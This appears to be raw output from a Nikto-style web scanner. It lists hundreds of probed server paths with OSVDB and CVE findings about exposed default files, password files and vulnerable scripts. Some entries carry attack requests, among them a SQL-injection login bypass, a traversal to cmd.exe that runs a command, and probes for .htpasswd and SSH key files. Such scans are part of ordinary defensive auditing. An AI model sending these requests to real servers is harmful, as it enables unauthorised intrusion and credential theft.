+ OSVDB-3093: /modif/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modif/ident.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/Downloads/voteinclude.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/Forums/attachment.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/Search/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/WebChat/in.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/WebChat/out.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/WebChat/quit.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/WebChat/users.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/Your_Account/navbar.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /moregroupware/modules/webmail2/inc/: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /myguestBk/add1.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /myguestBk/admin/index.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /netget?sid=Safety&amp;msg=2002&amp;file=Safety: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /newtopic.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /nphp/nphpd.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /OpenTopic: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /options.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /oscommerce/default.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /parse_xml.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /php/gaestebuch/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /php/php4ts.dll: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pks/lookup: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pm/lib.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /poppassd.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /productcart/database/EIPC.mdb: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /productcart/pc/Custva.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /product_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /prometheus-all/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /protected/: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /protected/secret.html+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /protection.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pt_config.inc: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pvote/del.php?pollorder=1%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /quikmail/nph-emumail.cgi?type=../%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /room/save_item.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /screen.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/tradecli.dll: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /security/web_access.html: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /sendphoto.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /servers/link.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /shop/php_files/site.config.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /shop/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /shop/show.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /Site/biztalkhttpreceive.dll: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /site_searcher.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /spelling.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /staticpages/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /status.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /supporter/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /supporter/tupdate.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /sw000.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /syslog.htm?%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /technote/print.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /texis/websearch/phine: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /tinymsg.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /topic/entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /topsitesdir/edit.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ttforum/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /tutos/file/file_new.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /tutos/file/file_select.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cms/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /site/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /typo/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /typo3/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /uifc/MultFileUploadHandler.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /url.jsp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /useraction.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /utils/sprc.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /vars.inc+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /VBZooM/add-subject.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /wbboard/profile.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /wbboard/reply.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webcalendar/login.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webcalendar/view_m.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /web_app/WEB-INF/webapp.properties: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /XMBforum/buddy.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /XMBforum/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /x_stat_admin.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /yabbse/Reminder.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /yabbse/Sources/Packages.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /zentrack/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /_head.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ows-bin/oaskill.exe?abcde.exe: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /database/: Databases? Really??
+ OSVDB-3093: /.wwwacl: Contains authorization information
+ OSVDB-3093: /.www_acl: Contains authorization information
+ OSVDB-3093: /.htpasswd: Contains authorization information
+ OSVDB-3093: /.access: Contains authorization information
+ OSVDB-3093: /.addressbook: PINE addressbook, may store sensitive e-mail address contact information and notes
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.forward: User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to.
+ OSVDB-3093: /.history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.htaccess: Contains configuration and/or authorization information
+ OSVDB-3093: /.lynx_cookies: User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites.
+ OSVDB-3093: /.passwd: Contains authorization information
+ OSVDB-3093: /.pinerc: User home dir found with a PINE rc file. May reveal system information, directories and more.
+ OSVDB-3093: /.plan: User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol
+ OSVDB-3093: /.proclog: User home dir with a Procmail log file. May reveal user mail traffic, directories and more.
+ OSVDB-3093: /.procmailrc: User home dir with a Procmail rc file. May reveal subdirectories, mail contacts and more.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ OSVDB-3093: /.rhosts: A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh/known_hosts: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3233: /jservdocs/: Default Apache JServ docs should be removed.
+ OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.
+ OSVDB-3233: /akopia/: Akopia is installed.
+ OSVDB-3233: /ojspdemos/basic/hellouser/hellouser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
+ OSVDB-3233: /ojspdemos/basic/simple/usebean.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
+ OSVDB-3233: /ojspdemos/basic/simple/welcomeuser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
+ OSVDB-3233: /php/index.php: Monkey Http Daemon default PHP file found.
+ OSVDB-3233: /servlet/Counter: JRun default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/DateServlet: JRun default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/FingerServlet: JRun default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/HelloWorldServlet: JRun default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/SessionServlet: JRun or Netware WebSphere default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/SimpleServlet: JRun default servlet found (possibly Websphere). All default code should be removed from servers.
+ OSVDB-3233: /servlet/SnoopServlet: JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /admcgi/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /admcgi/scripts/Fpadmcgi.exe: Default FrontPage CGI found.
+ OSVDB-3233: /admisapi/fpadmin.htm: Default FrontPage file found.
+ OSVDB-3233: /bin/admin.pl: Default FrontPage CGI found.
+ OSVDB-3233: /bin/cfgwiz.exe: Default FrontPage CGI found.
+ OSVDB-3233: /bin/CGImail.exe: Default FrontPage CGI found.
+ OSVDB-3233: /bin/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /bin/fpadmin.htm: Default FrontPage CGI found.
+ OSVDB-3233: /bin/fpremadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /bin/fpsrvadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/admin.pl: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/cfgwiz.exe: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/CGImail.exe: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/fpadmin.htm: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/fpremadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/fpsrvadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/admin.pl: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/cfgwiz.exe: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/CGImail.exe: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/fpadmin.htm: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/fpcount.exe: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/fpremadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/fpsrvadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /_private/: FrontPage directory found.
+ OSVDB-3233: /_private/orders.htm: Default FrontPage file found.
+ OSVDB-3233: /_private/orders.txt: Default FrontPage file found.
+ OSVDB-3233: /_private/register.htm: Default FrontPage file found.
+ OSVDB-3233: /_private/register.txt: Default FrontPage file found.
+ OSVDB-3233: /_private/registrations.txt: Default FrontPage file found.
+ OSVDB-3233: /_private/_vti_cnf/: FrontPage directory found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3233: /_vti_bin/admin.pl: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/cfgwiz.exe: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/CGImail.exe: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/fpadmin.htm: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/fpremadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/fpsrvadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/_vti_cnf/: FrontPage directory found.
+ OSVDB-3233: /_vti_cnf/_vti_cnf/: FrontPage directory found.
+ OSVDB-3233: /_vti_log/_vti_cnf/: FrontPage directory found.
+ OSVDB-3233: /_vti_pvt/administrators.pwd: Default FrontPage file found, may be a password file.
+ OSVDB-3233: /_vti_pvt/authors.pwd: Default FrontPage file found, may be a password file.
+ OSVDB-3233: /_vti_pvt/service.pwd: Default FrontPage file found, may be a password file.
+ OSVDB-3233: /_vti_pvt/users.pwd: Default FrontPage file found, may be a password file.
+ OSVDB-3233: /help/contents.htm: Default Netscape manual found. All default pages should be removed.
+ OSVDB-3233: /help/home.html: Default Netscape manual found. All default pages should be removed.
+ OSVDB-3233: /manual/ag/esperfrm.htm: Default Netscape manual found. All default pages should be removed.
+ OSVDB-3233: /nethome/: Netscape Enterprise Server default doc/manual directory. Reveals server path at bottom of page.
+ OSVDB-3233: /com/novell/gwmonitor/help/en/default.htm: Netware gateway monitor access documentation found. All default documentation should be removed from web servers.
+ OSVDB-3233: /com/novell/webaccess/help/en/default.htm: Netware web access documentation found. All default documentation should be removed from web servers.
+ OSVDB-3233: /com/novell/webpublisher/help/en/default.htm: Netware web publisher documentation found. All default documentation should be removed from web servers.
+ OSVDB-3233: /servlet/AdminServlet: Netware Web Search Server (adminservlet) found. All default code should be removed from web servers.
+ OSVDB-3233: /servlet/gwmonitor: Netware Gateway monitor found. All default code should be removed from web servers.
+ OSVDB-3233: /servlet/PrintServlet: Novell Netware default servlet found. All default code should be removed from the system.
+ OSVDB-3233: /servlet/SearchServlet: Novell Netware default servlet found. All default code should be removed from the system.
+ OSVDB-3233: /servlet/ServletManager: Netware Java Servlet Gateway found. Default user ID is servlet, default password is manager. All default code should be removed from Internet servers.
+ OSVDB-3233: /servlet/sq1cdsn: Novell Netware default servlet found. All default code should be removed from the system.
+ OSVDB-3233: /servlet/sqlcdsn: Netware SQL connector found. All default code should be removed from web servers.
+ OSVDB-3233: /servlet/webacc: Netware Enterprise and/or GroupWise web access found. All default code should be removed from Internet servers.
+ OSVDB-3233: /servlet/webpub: Netware Web Publisher found. All default code should be removed from web servers.
+ OSVDB-3233: /WebSphereSamples: Netware Webshere sample applications found. All default code should be removed from web servers.
+ OSVDB-3233: /index.html.ca: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.cz.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.de: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.dk: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ee: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.el: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.en: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.es: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.et: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.fr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.he.iso8859-8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.hr.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.it: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ja.iso2022-jp: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.kr.iso2022-kr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ltz.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.lu.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.nl: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.nn: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.no: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.po.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.pt: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.pt-br: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.cp-1251: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.cp866: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.iso-ru: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.koi8-r: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.se: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.tw: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.tw.Big5: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.var: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /iissamples/sdk/asp/docs/codebrw2.asp: This is a default IIS script/file that should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-3233: /iissamples/sdk/asp/docs/codebrws.asp: This is a default IIS script/file that should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-3233: /iissamples/sdk/asp/docs/Winmsdp.exe: This is a default IIS script/file that should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0738. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-3233: /a/: May be Kebi Web Mail administration menu.
+ OSVDB-3233: /basilix/: BasiliX webmail application. Default mysql database name is 'BASILIX' with password 'bsxpass'
+ OSVDB-3233: /interchange/: Interchange chat is installed. Look for a high-numbered port like 20xx to find it running.
+ OSVDB-3282: /uploader.php: This script may allow arbitrary files to be uploaded to the remote server.
+ OSVDB-3284: /iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example Winmsdp.exe file. Remove all default files from the web root. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0738. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-3286: /conspass.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081
+ OSVDB-3286: /consport.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081
+ OSVDB-3286: /general.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081
+ OSVDB-3286: /srvstatus.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081
+ OSVDB-3396: /mlog.html: Remote file read vulnerability 1999-0068
+ OSVDB-3396: /mlog.phtml: Remote file read vulnerability 1999-0068
+ OSVDB-3396: /php/mlog.html: Remote file read vulnerability 1999-0346
+ OSVDB-3396: /php/mlog.phtml: Remote file read vulnerability 1999-0346
+ OSVDB-3411: /soapConfig.xml: Oracle 9iAS configuration file found - see bugtraq #4290.
+ OSVDB-3423: /XSQLConfig.xml: Oracle 9iAS configuration file found - see bugtraq #4290.
+ OSVDB-3489: /surf/scwebusers: SurfControl SuperScout Web Reports Server user and password file is available. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0705.
+ OSVDB-3501: /_private/form_results.htm: This file may contain information submitted by other web users via forms. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052.
+ OSVDB-3501: /_private/form_results.html: This file may contain information submitted by other web users via forms. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052.
+ OSVDB-3501: /_private/form_results.txt: This file may contain information submitted by other web users via forms. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052.
+ OSVDB-3512: /scripts/tools/getdrvrs.exe: MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm).
+ OSVDB-3591: /project/index.php?m=projects&user_cookie=1: dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.
+ OSVDB-379: /site/eg/source.asp: This ASP (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0628.
+ OSVDB-4: /iissamples/exair/search/advsearch.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ OSVDB-4013: /isqlplus: Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user ID field. http://www.ngssoftware.com/advisories/ora-isqlplus.txt
+ OSVDB-4161: /data/member_log.txt: Teekai's forum full 1.2 member's log can be retrieved remotely.
+ OSVDB-4161: /data/userlog/log.txt: Teekai's Tracking Online 1.0 log can be retrieved remotely.
+ OSVDB-4161: /userlog.php: Teekai's Tracking Online 1.0 log can be retrieved remotely.
+ OSVDB-4171: /ASP/cart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /mcartfree/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /metacart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /shop/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /shoponline/fpdb/shop.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /shopping/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4237: /ban.bak: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
+ OSVDB-4237: /ban.dat: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
+ OSVDB-4237: /ban.log: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
+ OSVDB-4237: /banmat.pwd: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
+ OSVDB-4238: /admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected.
+ OSVDB-4239: /admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected.
+ OSVDB-4240: /utils/sprc.asp: Xpede page may allow SQL injection.
+ OSVDB-4314: /texis.exe/?-dump: Texis installation may reveal sensitive information.
+ OSVDB-4314: /texis.exe/?-version: Texis installation may reveal sensitive information.
+ OSVDB-4360: /acart2_0/acart2_0.mdb: Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.
+ OSVDB-4361: /acart2_0/admin/category.asp: Alan Ward A-Cart 2.0 is vulnerable to an XSS attack which may cause the administrator to delete database information.
+ OSVDB-474: /Sites/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-474: /Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-474: /Sites/Samples/Knowledge/Push/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
